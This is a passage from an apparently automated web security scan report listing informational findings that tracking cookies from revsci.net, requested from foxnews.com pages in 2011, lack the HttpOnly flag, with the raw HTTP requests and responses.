rsiPus_0="MLtHr1MusT9zJTGzTnzvq4n0ZMEy4vDR9Gb6q+MIh06yeOdpf0mEy8XThTfozoGYWtU3MfVnJY6ibFhL0ESkwKOEwwzbepiyOZ6ZH3pwt2GNiI57SaMBMBu6Sg+rOnIwrBpaU4wyTZvSHoD62ipRALgIYFAurZnoXzKTFQBzwv5t6RrF8K+/p21OC2jpphALAwt26Nn0ZehEs2HpKt1D5KzAZ1jkzG9eJGaULQslNtoEwBEPdj4SxuChuXlZvY20v+Qxs0hloXYxr2dDXV+fmEAkM0Xg4OCGwzN2ingsZP/egH5EpjxR"; rsi_us_1000000="pUP1JU2j/wMU1Y1iQBIXfzyX0DTLJ/7T0vSxbMJk4N1qqrMeRjve4HnZBXtN2co0X00La1ka3oL/1ThMiPc4WRkxTlwyCT3N3Z6BbCtTzRsj3kvAaSSODVmEEyUXLgJSRJWOAa6PjIe7erHQz84ro4C1a2bje8F2an/Pa1BVDUqRBmOXmuSzeu0GTqegMqsel63xBa3ISuvYJuE3YNLmO66G1jNGWXGAsI2SoSPEc/vT53l1rg2bwMgqso8vbxDnPDVc2E2fD5OQh1IvjQWnWXTRsowjnUA4fCNUmmwzKmHtoLri7Kp4wvG0WEz0zXzTDY/gIFrdusNpFtE15ktd2dwpKNsehxDEdj40feZEptBfqjoERvCZNLNYkjHWHgS8qDztRcU/1F/o65w0tBbd1pizHEIZMG+cN/YBQtFdarQhjKJS38I176v1PUG/JiZ3E3rCn4EA0cpdL+PpUbXnpyPlW4DL/TnYoZQVmCIQSg7udIwiCVXkl8+49rMfFpkxOm2FhIQcYJYDxWj8Kq6L29DhfoPSHY0Lhol9JSv8iEVSl4vscMevnDrRD1QlJfl20pmeu1wwl1kX2oNNaThJq9LmPK+EQh5rt9JMjsTao66FjZPgC5weE10TEE+YgLBynIcvCEYLnIiwm0FdccWqGzXXXUFMDsoAlcvf3D6LM2TgiZ4GD1ktQvsfj8ISO/a9gk4E0yyRyA=="; udm_0=MLvv9SMJaSpn557EdtKGREzM5uAkEsBEbZaaSamC1ltg80jsQpPrRW9xUPO7gbf50ex879sHUlxsDSMSyT40d3g9KBDbsUvidic08XBBQHFpSyLGI5hDuOC+N0tdFOaeJa6Io42FsYztne2DyngaUns789MACDCGUIu11dgC3DX1bT0q7kGCESC9qd6gQZWcGOqTn6wCLrFZSsOsx1U3VyX6AUfzLq59t1osdjMkgr9oJAz+GlqViD1Yr53Li8V+cOkhx0n/v7sFXCx9I2XIChqeBIIkhNyVbnOnrwVnGGXS/rGV42RP9F9/y5CozKiUpBJsMPsorf+K4d7Lh/qgU8mROnC0E6UCLH0lL+9k6sb/9Hds9aGWi3yuwB3QyDmYq+XdG1vt3U4XOglK59Trf0M7SBLodLkTDd3onRp9Pv5GOLBppvfATthLTk5+JdWGkY93Q79Y6qo7qrQTQUmwOxDFNsHDF+YuTtL2H0hIwbUkm1U9W2FXruUHCCe5nB9O/JM3Vixi5pGsKpQ3cBQA3/ESHdt2BFW1V0bWorucedsLmmtkRseBiCsvTymhUBGNDbvZNFJ0owNCuU0S9C97z951WlTLREpHfgVvB+jIs45SZQnF1gPeMyfOlFlQ9R1HSf1+QHW1g20w1M2ck6AeyROb+zf5yBaBhgGEUqTrE7ZZ32hLHflgjGrdjdL5rgxvC5vOo3f7uC8SlCRz+zRhYp/Wr3epsU2tUICaK+g0oHWLUFkFggvnwUmTZ5+cn5jAVQC2MfozHq1iU+pV+qQjEQAL8JkY3V6ZCpejOFyLibGapi2c0yCa9KESNSSlLHL3fuVqvwf7CwTDDdOH03whID1XJ7HwDCCnceXv909Z6e04bEa2NSizHfsjEri/wxcXli39NSMiH3c5el6NL/xSMd7Wq+MOYDch3j/v127OCTPmUlEN6hYcqiPTHOldGgtSSqc5jBAlJsv30eQCAj8otRGjPlbbh4x32VUimjN4XY4T6dC/th0AxXicEAdLeaXqZy3mFe7HgL2N9JSUTcMG4RLTgJ4X7PKYpA07eRfRkj3wtxajbHJq+rTtHNv+YR66iKZlgzmtUkW76Sv7pWqYkbs5tvXm1HObNNuNbEbOHvRkMwLZTenj8V8Ymo0qnQHOG3s1yVgYks/JF0gh7rG5F2g1v2If9fqUIAGmZoRnnPG7qdLu72XehnOhgo8tvcKfVA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_yftK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5kOBLwIMpzaxu2E2X52BOqEAEKTaYgYB7RmorjQ0sQ/Z0pMs/uNhWv9kDsM6I1OyNKGAI79hIwKvbOAlumXzgyuUaTFaCH+V4aSgqG2GMjvmS59xVuCAf4vueiYFNo9S72YpjYVEQ02rXdEHf5wlv+bSTNA6SWGQkpXPkeVMyYiNWPYHAe4Sbo5xtcg7NhepYVZNtESS2YwzmHnEqcLi9afckAgiSlty43k/VIylR3orMCyVm/ydJj2xt43XF4gHS2Ma7Phd6W8DNhcci4KdRaug+fsZf4pNBY66H3QSZ3I3F+yd8Cvi2BwwEMpzFrvbntG16zBEew==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:41:15 GMT; Path=/
Set-Cookie: rtc_naNh=MLsv8SVKcR5n5bLrq5gACIHaNi9NrDEErILtKT6KaMjh9FvAc/FYAEbD1AFIKRnVK8Nn0XgnoG4pxoPjUZVkiOaoo9MSkxfH8UtTjXb8JspCpaCBt+pXOUV+TqfJZVi7m6lzqvCfVC1N4cRJhKoNgcxZglSP2A+b4Z3nLGdE/q9Gp8/sA+3FxZYr2PuqFmHcWUZpNNKYgpEcdYJg268e6XxvmClfh5miu6Tr9CQ6ZOsRKvERBLkWPhhnB5Eg/I3ueNCqe7ZlY/FIejkmqyA5qs0rDMa6QuyedVUcyGn4YNedOOE42PwWnqTsWu/2AU/jgvSLM1RShGnwYhixAF3Y3G8TZ6fiDYOhuQPtQsLHL/EcuAf8MKQ/uDN+4AvnXLaglfPQjeP8QbfoZwGChOp5OFp/THda2UYpirwONMkGDD+oTfaBdgJXpGHsR/+TAnm4Bj/7gtvpcaY2ohWuGCTBMVZ5Ch2WNJz777mPJO9S4RjtFKZNQPpBe0NllM17Vwt9AY2k3kxsqAUWtn/3KrPfclNZsoY=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:41:15 GMT; Path=/
Set-Cookie: NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192b&0&&4da27787&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Mon, 09-May-2011 16:41:15 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:41:14 GMT
Content-Length: 729

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
6.121. http://pix04.revsci.net/E05510/b3/0/3/1003161/737002840.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/737002840.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/737002840.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; rsi_us_1000000=pUP1JU2jPhIc1A0uGehL84pPUbKzTkRplHTtDOLcFLL20Wt/xDozbuB9JMvwkAev2DUhq9kHuGUbrEuN8ON6TNG555znQzlM/5y3Of8x/X6dKg3FnSBBN+UlVxRdchaBGHVUKje4s8VkZQWjQ1gqgAwl+iH3n81oscO5chIWRZ36CXmDSa/OTIUw7CjGsrVH7jcNbZz1+P/5Cwum4IaWC0xqWyJ6XovDln8WaROkuTy33TUAHU61RJV5ivuxthgGJTnsGP2oim8WLMsNpJJA/LXcSgIXz4hNBUU9JAy7BvTu431M47rwgvXF1wwSs8CTVlcKnpNC+IZG/etg7wJ7v5WMpOoewDSPyl+D+ZITHQGpdDrmlVCTSuWtoRAk/fynI6itvIlfPCsB7ygRb9E+JbXqiTTZnEwFnkfcUSLpfgXJjDpEUtIjl0JADwIgGt00osG49t9IyNgiq4ztSgib+W2H7G4irTT7YqeFrKAKXiduq88e4SYI3XCR7PRqRGDSkcK7fP5pU4c4mWtpSGRpuZ/jQr+avXtESVqxm1F2x/dItR5K0ra7JZEPKK5ZdfMXYyC37FPztdunoZPk7PtuCqchU5n4be66l78i37EYOhAfDWUVKTiBXLEGa8OBYj5hoUrVcM75uopbp1ssdiEnTeE0OoyiUytxJOyUR0ZlVeXCl6VK+3+b7NaC+BUqdz1dLv+wtaIRVKaV4LStSk/n; rtc_TdTG=MLsv8yNKcQ5npbJrVs6vNkhIY6HjafGNqOTc1tAMxx8g2PSvwsElcsz7aCnYMEcFNWuyY0i34UZIUNjkLRgI9LkPCbfeH+KZCLxbrVb0tyqLkPb8grbjELIzOkhM53hlyrO5D+rL+JnaL3Hgz4n/P6OIeeLVXqjCnekSd+pnyoVrDjtw9TBr8CCVq4T37CwxL2fr9HC5Xyzve+JV52sLe5TX8Fq441fmYhKVTwiwXgDbgCpHT8aXQ5IlJz8y8fgLe4eNS6Fl53mI7GKBW+UlaUFSBuQbZhtcO3D2OBEnfLRmqWHt0EKaTNhYxr2/rohU9ox3fR+oZzRh5qRrNtPznHi15vGfiD2UUSPtQ2m9GBRVzh3VMLAzWpfHW1PVV8Y3VCYwGDyD8cYBXAEJ3Vd5rOHHwhBgfvfAAmitYuz1Iize51YbT9xVYpZfTNN+C8RpPYOW70eMODRYGng1A6swXECmgJNSt2kT2e0zp8sp4SIIim0M1qMchTiNAj+6qVH3UHnC6UtfizKH6aGCntAnR++9hA==; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPF5kOBLwIMpzaxu2E2X52BOqEAEKTaYgYB7RmorjQ0sQ/Z0pMs/uNhWv9kDsM6I1OyNKGAI79hIwKvbOAlumXzgyuUaTFaCH+V4aSgqG2GMjvmS59xVuCAf4vueiYFNo9S72YpjYVEQ02rXdEHf5wlv+bSTNA6SWGQkpXPkeVMyYiNWDYjvLUPrW3poFL9bofizkV7I6ynO1TtYsgOwEMnIgbNsHH6nCwM0Kxbt46lR3orMFmVm/ydpkuxt43XF4gHS2Ma7Phd6W8DNhcci4KdRaug+fsZf4pNBQ6pH3QSZ3I3F+yd8CtC1RwwEMpzFrvbntG1S7ZEbg==; udm_0=MLvv9SUJaSpr557EdtIX6fE3HZxD2tVEbZaaSakC1Vtg80jsQpMZ82Rp4QDAVMIXzRVDE7hI/n/4akBaNcbN8GzvGBHbsQslcMTLNlRxc+ltcto7W3xwlydvz273pz0jQ4SVo42FUgVfwsuTJ73/ozLa5Dj4ttdtyx4ODj0c4MRgpOcHtrA9skVdsBvJxX6IA4P/mp6sWRYt1VtUyG21pdiMr6BE2SYIYkowggle26SPHtS97hgJom9QzF+fjkdopqa/eDqJ/hP21kuB7Nj/+t5E3SpclXlyj6NaRvJGIN17eN/umzN7wv+ezazt/lwqAWGvQUyaAiuB1TVylFtLbj7I0PdOEqjxsJKcOCJZ1JhXbmC1lZ6XChDbdUhU3t+YYwB//wiNi9Ld8batKsDYTWX0W6bmAEzQjeSWzUvtoONJgOSrqzLxsH3hcVyBsoM91FthCvWkrc0GDBVSVKzEww/Vo2msH1uIHBaQx3n9e13MpFHEYrkFOPjgbLG/rl8utHLnLWo971UO7HAZDcHPxOWByvPVoV7NG0dP25vYms68CezhpoXTWHnnVCE59stFSuvSrfAPWQ6FZGAe7Bjr9EcnT0FFDQQyTszjrf5QQlvbKIwEExhQMo10SGqH8E7rgEMNFS1sTmfkix3bXcdRC/4c17mQuMHwkssVmYY+3jS/LSNovgvkDf4Yy52ORyslLJ2KwcdH1HMx2WtoUSVh9tsdinADifa6eZOcI+g0oFmLUlkFggXnwMlgZpycv7iAIdiRqCzT2O7l4iJ7M9KxLjk1g4iCGD9d7Bnf8DlenBahcgWfsEGGIhs5S1kFpi2waCP7M7IujJgpjReKx1oUaC2n3sTgsAsWXiCGSqi2H+bXTiMMwsbJmmqfh868zK8DT+UO34iIPSUNvH+9LxJlBTM4zrgbRvxKmEfkoloEey8Su2LcC/4TDoX454zYkzghKdrM3/VDDSg+++jIzOmyR5H8EBbymNhwm7Cmao7CkbCQGVGV16kzTOLqS3tkquW5FO+I14XiU9MC7s+YlpQqTQVNzikypsQ4mMakObHYNqGm5smzfVuiZokZDMLmaJJ+zMjo6DR8oVkzbJ2cg0JXUK2spmVjvN0lBQ3ScDOssaW3dWwhnHwKlK+F52CFLZNUle4dDJXioVnhLAxZjivb1FLCoqz8bXtM5SEKXAk6zrOOICONbcEtivU=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_TdTG=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF50OBL3IQT7uItGE2X50BYAxWE6TaYgYB7RnoMcJSvrO+9OLE5ntqFncA2iMgLzp6KRZ8tbE744Tm93MOZ7zFHcbP2P2np4Hjp7CivkjLdnBnw6DcfOutzdt7dZ9yY9qoV66z93VI0+JHf9oWj4sFy8HiMV2EnCLTeV0HFR7FVgAt/1zFOKxzud7cTpNESacOEyvUEogZHBbVJqAuipp/GnX/pG6YMkC8q/EW+QDENAAhw0PSL9dP+BDZiMHRreB4C4CtNT6GPrBjOe3WXAyns810GYaxcCjTBu5X+eN07CmQvIW0/XFXsl1m4JoEW+Dw4E9IC9D9dAI=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:31:14 GMT; Path=/
Set-Cookie: rtc_zS5W=MLsv8SNKcR5j5rKvi7rucZQk1qHgb/GNFtDD/WY8x18gmPS3yvdKBMFYSwStZcq2W35AfEghHnyiDCgEwe27pElUg8X8v8NZiYvvDQcHb2EcrzzYA+V3Rp3X4RdajVqjGfhZPpd//XrD4QnzuZutrhO5pfLINzYq6lNczX+1sNRXpJYKn/SO9Y2LCojamRji3HwN0umAD+C/kuzJSdyB1bzd1oBKC6uI8jhxiEJLyEl96cgjclheS3iWyvf92irFP3KCNXFb5VjqcBTZUFs9ORmuQqUR7P4GyHoh19L5Ri3q+yBrJYnaUMzG+BQZA0+p26Xp7UaGh2pzCVLJhJkdUu0PsG/ve25uLkrNMvHYscmFTutIg9JbCzY6TWp69oUR4AlKVs7J2DCxCRuWSkkayVVHMk1/dV4vmfGSHG4Bgr1PZKfIy8IXYHHYLfNLx3Z6g+gW1yepRK+07nyTrczsVQ1JLZtkslpVjAL5Ai/jdTgLoSM4I7Zq3qxEyeb3UVIVMyM6n8doRcZpCrd5mYLnDQB4sps=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:31:14 GMT; Path=/
Set-Cookie: NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Mon, 09-May-2011 16:31:14 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:31:14 GMT
Content-Length: 729

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
6.122. http://pix04.revsci.net/E05510/b3/0/3/1003161/779915473.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/779915473.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/779915473.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252F%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_nJDN=MLsv8SMucB5j5hAH0vmC/252VHiLIgT9sbGvQkQvgrafLIBiBEREiMw9JMHYtmWAML6kTuNHWEhy9hojbdls+dquwaa5GuMToA3eQeIOKZU4EPLYIyw/1PF5b3337mlJR4MFicB6+ZhO4eo2hIosgeRPF1VsnEwSW73nLGe8/i9Fx925s2s5IqolwaPstmdeLowJqlIYdQ2l5XhdhHdkaxQvMw0eLcHsQ1mVT8azUmBbvyo/Cw6yNsQc4SsNfFGkesd1eUewEe1KFcSACCYGCX7PqHiCqh6JpcY3Xecg42q2j0Nb3H+oR/930ZfKST54xVszS/4aMJzKqAH0raB0p9t9kyBANRK56/5sDFV5v3gPUuIQrv12o3AZh2JKsvhbcS8oB8bsiS3iFlBeBhFQMXVeMoS1C1NjSBDpUHXi0ILIPeIjTtrWUgq4W2ZgGPlrvKgYwRx04vWr7RqamvgBSsOZkiq3KItyJkA6gszT33rHfwJ1wsam6ahy12FPJRWnA15T5vdg4Z+riVZhzvuy; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; rsi_us_1000000=pUP1JU+j/wMU1E0vlyYQu/odt1fKJ/4TCGxWoexa1KYZ/3eWVOtHxCt/UW8ma9A/UG4vW7oCUmYVXbBWZ8nrLVFixDgisw4B0TAoSU97Uaf2Ag8IRSTbsOyGF3Zd9gICESgvbXWQbYk9mAPqb6AswT86Oy+CWTktzFK8gz/h1EAWZqiM/Wr8ciVNwciV4RS3inZv72wktljmXlX9Z7UltYWdXGxFWPAvWBwsx+o3GzE+xZkpftFPjZDw49KC8OWW2oRN/nvMXTHfWWPkSWVj2NUUgLy2M33BGnWK6Tph82HtZefi7Bp4hsTR6uZj+Jqv/ijFKRHOPLnB7vCVAmO1qx0dEUtPNgJIbAF6hhZf9Tl61DqsxVk/37g0lgNT7D4Ig/yqpJInTwMav9vLZkFbbVaoeUGsiRVhzOFf9n1bipzfSqkw/RASKAqXPhxEyFdomaFm1UwloXIDGc7ZeFMKyoCmjJYk5rq0JG8ltfjHAbS7UwQu5rLpDwdxrAqgcW7t3WjRU+K8E2KMSuksY0ArFgmt/Q8IaAfa9oV1Emg0du63YtS6ECJKjSC7xO59kA0M/f4Sv8tjK6lHLxq4hluWFEhgH5u9KARyIsBhpE7JArmB0vDBIVQ2IvmYusGXwHtk96O1XUB3ed379AVnlcA72HE8dvMPUlSsfFcDHtHqRtm+prXQxzwqDH1IwWhPdbfdmBq9s5dUaTjaRABA; rsi_segs_1000000=pUPFJ0+BLwIMVZ94t6n70FESK29kanhJ0QSlgYlQhPrU/yUINJwrcQgYrs0bIzTjXSBIvMNkIBiuJgarbOA1uuXeLwfO2d23oOEKy7C6vk/KdbJkwePcfNW13dt7e591Y9qoV66zz0eSVA4YYSNm+MYnb/wSGVYFj8w5eBYcU7DTnXdYuI5fOkUJfFNu58SHNNXmXg3an21t6vplOGV0VptnQfh4IsheMqumOIRoojYKGbQJcGvyqKXscG3j2V1xYJDXd9kF4iQTS9AmFOJ+yuPrjtN8jcwidi/LCdYdzbkPBzUS893X7vssmBryl8lArQ==; udm_0=MLv39SENLipv597J/rhYqUPUUUXMiqQ8IKvYHLMNBLY8U9b+BbeOxUTsdJpOSJxtV2G67isUGw6PmqIoIYzEOsqbZXFOHQmTWOdDJozienVh2BrOKZ3rh8cHzvXBmBefwRGbo5WLkgrPUr7Qf7YYaH+DHaxT3aAAtsJcmJXLdrFv71yi0F09sGXdriEjHJ61l6iekoMGKFBiCZMLInb8OiV4/BdGMgYEfnr6/VQaEeuwqznuzZKk08/IDRSdoaczKu/PViZDa0NfWzZmYF9+D+Mdeaabx8Jzb/QO1XFdIsfhtUeAxDC4O+2nDXKF9K+zWStE7K7Zw1McXQb8LTxNntE55dHS8NUJZFkW/OflzT4tfUF5rDxKjhft4wJ5bNM1/q0oGZ+XnxRkPzvC3zb/7XkrudLiPZz8vD+YhMKlvla3BGi6HXcoXA7RRZNF1Qlkq/gXl9RGct3H3YWLtguKdr2bsBh+x6DGSYvKIKg/cIJlyR0+O6xddTirzB32How4XCck6FhIknAwQyXcx+C6QjP8sbUEyQj2H8tw25PYWpGvSp4hCIOA+3dLoCB9MKKCNl49BUZofdQL5yfEqf7DymjEGzCaEhM3tS89D66MaYekpDdFWniPUREqaluSK0mHYf73LmVifWUpkNmqL9sPZwU/wlGL2l8qZeVbl/trGriF0TUwmUJxZdYC7qy81hCFsdrehpaZBIu9suEv3yHhotaHOrpJ/KNJQtzex1CaNRJVh/Ypdvr497SVA97e3BecozQ6BEejP0cGtgbiV/OxUTAD9OniGM9f7hvHoDm+nGaRcsWeNkKG42g1CFUBtq2gasL0TzIujpqprNeP43zJ7yYHJbQhnvZa/EOa864TTcdbc0a2tjSwJLTFXIFXxxduJxdrTg0Yp7cpFOb+saNjODmCnVkFky/un40mmvgVc7vknmA3svXRz5L65w7bjzgpKVsNQ6rxG6O1RMjIzOmKT4tvjqdy6RxLc6+Yao7S8fCgCUmF97kjQCore3vmq+dAP79UeYTZTjCyfwPZaZQqTQVNzugypsQ52PZDObPAsf5EO2ZYPyKPg6fPYg4DwI/1UblLVSYBGoKO7MsOZPZo8504wyF8sWlBL40bhdmpyJBTH4FkbmJzuK6d9LeiRdqp5AhjJQJBbpP0KtMyrCmgSHyZnKLyHVlRFd20DjqOHmHF8otl

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_nJDN=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF50+FrwIUb5Iv1hjJIqJ9eK1cwhkJDDfAwa9raI9UqwLZJuXB5D/qNDdA7/IG7WUygcoUIQSRoQbefu8lumXzgyuQbzFqGH8VFZXYn+GbPSDlVTXiz/uNx0oiL3pvBbz1sXjw1DqqfCfFJDXEwFZaD5LQTNA6b/+OncXvzh6WE0e1nXpnBqhzud7cTpNESacOEyvUbqqnJew9brqz3U8j/bhaop2Qe9kDTRdVVx8KEAUyz/5meJFNfJuWXgtH9AFhbtFpEYcY2pJMlxc1HfK7uzrKYxFytzYJN+NmCY2RWO/ugYnH4LzhNhzfFzg+JdudDu1ZF/wodAI=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:21:16 GMT; Path=/
Set-Cookie: rtc_o1AK=MLsv8yNKcQ5npbJrVs6vNkhIY6HjafGNqOTc1tAMxx8g2PSvwsElcsz7aCnYMEcFNWuyY0i34UZIUNjkLRgI9LkPCbfeH+KZCLxbrVb0tyqLkPb8grbjELIzOkhM53hlyrO5D+rL+JnaL3Hgz4n/P6OIeeLVXqjCnekSd+pnyoVrDjtw9TBr8CCVq4T37CwxL2fr9HC5Xyzve+JV52sLe5TX8Fq441fmYhKVTwiwXgDbgCpHT8aXQ5IlJz8y8fgLe4eNS6Fl53mI7GKBW+UlaUFSBuQbZhtcO3D2OBEnfLRmqWHt0EKaTNhYxr2/rohU9ox3fR+oZzRh5qRrNtPznHi15vGfiD2UUSPtQ2m9GBRVzh3VMLAzWpfHW1PVV8Y3VCYwGDyD8cYBXAEJ3Vd5rOHHwhBgfvfAAmitYuz1Iize51YbT9xVYpZfTNN+C8RpPYOW70eMODRYGng1A6swXECmgJNSt2kT2e0zp8sp4SIIim0M1qMchTiNAj+6qVH3UHnC6UtfizKH6aGCntAnR++9hA==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:21:16 GMT; Path=/
Set-Cookie: NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147c&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Mon, 09-May-2011 16:21:16 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:21:15 GMT
Content-Length: 729

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
6.123. http://pix04.revsci.net/E05510/b3/0/3/1003161/794483737.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/794483737.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/794483737.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
